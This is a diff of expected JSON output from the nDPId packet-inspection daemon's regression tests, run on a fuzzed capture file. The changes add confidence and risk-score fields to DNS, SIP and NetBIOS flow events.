-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685452,"flow_last_seen":1120469685452,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469685452,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.17.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_zip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685452,"flow_last_seen":1120469685452,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469685452,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.17.1","src_port":2724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_zip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1120469689458,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469689458,"pkt":"ADBUADRWAODtAW69CABFAABIadYAAIARXXvAqAECwKgBAQqkADUANFNK1tYBAAABAAAAqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00707{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00660{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00814{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697460,"flow_last_seen":1120469697460,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1120469697460,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120469697460,"pkt":"ADBUADRWAODtAW69CABFAABEadcAAIARTX7AqAECwKgBAQqlADUAMORCQNcAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697460,"flow_last_seen":1120469697460,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697460,"flow_last_seen":1120469697460,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469697460,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1120469697462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120469697462,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CqUAR8a+QNeAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAxWAQAAJxAACwlsb2NhbGhvc3QA"}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":118,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469697462,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":118,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120469697462,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00394{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":119,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"ts_msec":1120469697466,"pkt":"ADBUADRWAODtAW69CABFAAA+adiqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":119,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":42}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469697468,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1120469697468,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120469697468,"pkt":"AODtAW69ADBUADRWCABFAABOAABAAEARt0vAqAEuwKgBAgA1CqYAOqrT7deBAAABAAEAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAcAMAAEAAQAAJxAABNTyISM="}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469697468,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469697468,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":1,"rsp_addr":"212.242.33.35"}}
 01004{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":122,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":533,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":533,"pkt_l4_len":0,"ts_msec":1120469697621,"pkt":"AODtAW69ADBUADRWCABFAAIHAAD6ADcRiibU8iEjwKgBAhPEE8QB877qU0lQLzIuMCA0MDEgbm9uY2UgaGFzIGNoYW5nZWQNCkNhbGwtSUQ6IDU3ODIyMjcyOS00NjY1ZDc3NUA1NzgyMjI3MzItNDY2NWQ3NzINCkNTZXE6IDcxIFJFR0lTVEVSDQpGcm9tOiA8c2lwNXZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz04fTVhMDBkDQpUbzIgPHNpcDp2b2kxODA2M0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MDAtMDQwODktMTcwMWIwNjctMzIwYWQyZGEzDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNjguMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTluNzA7cnBvZnQ9NTA2MDticmFuY2g9ejloRzRiS25wMTM4qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":122,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":499}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469552651,"flow_last_seen":1120469552651,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.37.115.0","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00617{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469542336,"flow_last_seen":1120469542336,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"217.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":180000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469554824,"flow_last_seen":1120469554824,"flow_idle_time":180000,"flow_min_l4_payload_len":102,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"192.168.1.2","src_port":53,"dst_port":2712,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469551656,"flow_last_seen":1120469551656,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469556827,"flow_last_seen":1120469556827,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"192.168.1.110","dst_ip":"192.168.1.1","src_port":2713,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554654,"flow_last_seen":1120469554654,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":49973,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469554654,"flow_last_seen":1120469554654,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2712,"dst_port":49973,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1120469540839,"flow_last_seen":1120469685883,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1120469540839,"flow_last_seen":1120469685883,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":450,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":125,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1120469731720,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"ts_msec":1120469779977,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
